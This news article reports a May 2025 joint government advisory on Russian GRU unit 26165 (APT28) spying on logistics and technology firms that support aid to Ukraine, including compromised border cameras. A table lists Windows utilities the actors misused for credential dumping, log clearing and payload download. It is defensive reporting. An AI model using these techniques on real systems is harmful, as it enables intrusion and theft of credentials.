The Cybersecurity and Infrastructure Security Agency (CISA), alongside the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and international partners, released a joint advisory today warning that Russian military intelligence hackers are targeting Western logistics companies and technology firms.
The campaign focuses explicitly on organizations involved in coordinating, transporting, and delivering aid to Ukraine.
According to the advisory released on May 21, 2025, the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center, military unit 26165, known in cybersecurity circles as APT28, Fancy Bear, or Forest Blizzard, has conducted an ongoing cyber espionage campaign since 2022.
.png
)
“This cyber espionage-oriented campaign targeting technology companies and logistics entities uses a mix of previously disclosed tactics, techniques, and procedures,” states the advisory. “The authoring agencies expect similar targeting and TTP use to continue”.
The hackers have targeted dozens of entities across 13 countries, including the United States, Ukraine, and several European nations. Affected sectors include the defense industry, transportation hubs like ports and airports, maritime operations, air traffic management, and IT services.
“Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise, and posture network defenses with a presumption of targeting,” CISA warned.
The advisory details how the hackers gained initial access through various methods, including credential guessing, brute-force attacks, spearphishing, and exploitation of vulnerabilities in software like Microsoft Outlook, Roundcube, and WinRAR.
In a particularly concerning development, the GRU actors have also targeted IP cameras at strategic locations such as border crossings, military installations, and rail stations to track the movement of aid materials into Ukraine.
Over 80% of the targeted cameras were in Ukraine, with others in bordering countries like Romania, Poland, Hungary, and Slovakia.
After gaining access, the hackers seek information on aid shipments to Ukraine, including sender and recipient details, transportation numbers, departure and destination points, container registrations, travel routes, and cargo contents.
Windows Utilities Used for a Malicious Purpose
| Utility | Description of Malicious Use |
|---|---|
| ntdsutil | Extracted Active Directory database contents via activate instance ntds commands for credential harvesting. |
| wevtutil | Cleared Windows event logs to erase traces of malicious activity. |
| vssadmin | Created shadow copies of drives to access locked files during exfiltration. |
| schtasks | Established persistence through malicious scheduled tasks. |
| wmic | Queried system information and executed remote commands for lateral movement. |
| certutil | Decoded malicious payloads and verified forged certificates. |
| net | Enumerated network shares and user accounts for reconnaissance. |
| reg | Modified registry keys to maintain persistence and disable security controls. |
| powershell | Executed encoded scripts for payload delivery and credential dumping. |
| bitsadmin | Downloaded additional malware payloads while evading network monitoring. |
| icacls | Modified file permissions to enable unauthorized access to sensitive documents. |
“These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments,” the advisory notes.
The joint advisory is signed by cybersecurity agencies from multiple countries, reflecting the international concern about these activities. In addition to U.S. agencies, contributors include organizations from the United Kingdom, Germany, the Czech Republic, Poland, Australia, Canada, Denmark, Estonia, France, and the Netherlands.
CISA recommends that organizations implement robust security measures, including network segmentation, multi-factor authentication with strong factors, regular security updates, and careful monitoring of access logs for suspicious activity.
This latest warning comes amid ongoing concerns about Russian cyber operations targeting critical infrastructure globally. Earlier this month, CISA and other agencies warned about Russian hackers targeting operational technology in water systems.
Equip your SOC team with deep threat analysis for faster response -> Get Extra Sandbox Licenses for Free
